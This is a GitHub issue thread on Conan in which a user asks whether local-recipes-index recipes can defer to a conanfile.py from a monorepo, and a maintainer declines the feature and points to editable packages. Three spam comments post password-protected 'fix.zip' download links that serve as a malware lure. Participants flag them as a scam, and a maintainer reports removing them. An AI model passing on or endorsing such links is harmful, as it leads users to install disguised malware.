### ISSUE TITLE
[feature] Refer from a conanifile recipe to an external conanfile recipe.

### ISSUE THREAD

**Issue by ldrozdz93** [conan-io/conan#16872] opened 2024-08-26 03:27 UTC
### What is your suggestion?

Hi!

I'd like Conan to be able to transparently reuse a sourced `conanfile.py`.

I have a monorepo with multiple services. Each service has a `conanfile.py` recipe alongside the source files. I'd like to version each service in a private `conan-center-index` repo by using a list of `[directory_in_repo, commit_sha]` pairs referring to that service location in the monorepo and the monorepo sha. The actual version tag can be maintained by service conanfile.

That would require Conan to be able to pull the sources with the `source` method, but then shift any Conan logic to actually use the sourced `conanfile.py`, instead of the initial `conanfile.py` Conan was invoked with.

### Have you read the CONTRIBUTING guide?

- [X] I've read the CONTRIBUTING guide

**Comment by seeronline** [comment] 2024-08-26 03:30
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment] 2024-08-26 03:44
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ldrozdz93** [comment] 2024-08-26 03:45
Damn, AI scamming bots are scamming github now? God help us.

**Comment by seeronline** [comment] 2024-08-26 04:05
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by memsharded** [comment] 2024-08-26 06:03
I have removed the spamming comments and blocked the bot

**Comment by memsharded** [comment] 2024-08-26 06:10
Thanks for your suggestion @ldrozdz93 

I am afraid that I didn't fully understand the problem that is being addressed by this suggestion.

But from what I understood, I can give some design criteria of the ``local-recipes-index`` feature:

One of its main goals is that this feature is absolutely transparent, and there is absolutely nothing in a recipe that ties things to a give ``local-recipes-index`` remote. Recipes cannot contain any logic that only works with this new kind of repo, they should work exactly the  same under the canonical ``conan create`` + ``conan upload`` flow.

You can check from https://docs.conan.io/2/devops/devops_local_recipes_index.html, that this feature is intended exclusively for third-party code, and it will not be recommended for first-party code. Monorepos like you are commenting is mostly about first-party code, is your case about third-party packages only?

**Comment by memsharded** [comment] 2024-09-02 08:43
Hi @ldrozdz93 

Any feedback or further question here?

**Comment by memsharded** [comment] 2024-09-25 21:59
Any follow up?

**Comment by ldrozdz93** [comment] 2024-09-28 04:02
Sorry for my lack of responsiveness.

>I am afraid that I didn't fully understand the problem that is being addressed by this suggestion.

The thing is: 
- I have multiple libs in a repo in dedicated directories.
- Each lib has a `conanfile.py` recipe.
- I want to use those libs in a versioned manner.
- I also want to edit some open-source conan packages (recipes) to better fit my use case.

That's why I've decided to go down the `local-recipes-index` way. Is my reasoning correct up to this point? 

The recipes are in my monorepo, so what I want to achieve using a `local-recipes-index` recipe is:
- Let me specify version, my monorepo sha and the lib directory inside it.
- Source the monorepo on the given sha and go to the specified directory.
- Take the `conanfile.py` __from the sourced monorepo__ and build it as usual, using just the version from `local-recipes-index` recipe.

Is it practically possible to add that support to conan?

**Comment by memsharded** [comment] 2024-09-28 11:05
> That's why I've decided to go down the local-recipes-index way. Is my reasoning correct up to this point?

I am afraid not. From the docs in https://docs.conan.io/2/devops/devops_local_recipes_index.html, you can read that ``local-recipes-index`` is designed to work with repos with the layout of ConanCenter, that is for **third party** code. It is not well suited for working with your own code. It might work if you want just to consume those projects as a pure consumer, but it won't easily allow to work on that source code.

Because I assume there are inter-dependencies accross the different parts of that mono-repo?
You have to note that every change you do in source code for ``local-recipes-index`` will do a full re-build from scratch, which is slow and inconvenient when changing source code, in which you typically need incremental builds.

> Is it practically possible to add that support to conan?

This doesn't seem possible. The ``local-recipes-index`` is an abstraction over a remote repo, which means things are always resolved by Conan ``requires`` in the form ``pkg/version`` (or ``pkg/version@user/channel#revision`` in its full form), but there is no way and it is not planned (we know it doesn't work well from experience) to add other ways of referencing dependencies from ``conanfiles`` that include kind of harcoded paths to locations as git repos or commit shas.


So the recommendations would be:

- Use ``local-recipes-index`` for third-party dependencies that you don't work on the source code. It can be both for a fork of ``conan-center-index`` for custom modifications of the recipes there, and for possible other third parties not existing in ConanCenter.
- Use a real server to host the packages created from the ``local-recipes-index``. This is the only way to achieve full reproducibility, traceability, as recommended in the docs https://docs.conan.io/2/devops/devops_local_recipes_index.html
- For working on your own source code packages, the recommended approach is to use ``editable`` packages: https://docs.conan.io/2/tutorial/developing_packages/editable_packages.html. It is not as convenient as working in a single project in a mono-repo, but at least it allows local incremental build for several packages simultaneously. The thing is that the "package based" and "monorepo based" development paradigms are quite opposite, so it is almost impossible to have both simultaneously with the same good developer experience. We are working now on the ``conan workspace`` feature, a way to manage several ``editable`` packages simultaneously more conveniently, but still it won't be exactly as a monorepo

**Comment by memsharded** [comment] 2024-10-16 09:00
I am closing this ticket as unplanned, but  please don't hesitate to re-open or create new tickets for any further question or issue. Thanks for the feedback.

**Closed as not planned by memsharded** 2024-10-16 09:00 UTC
Labels: unplanned
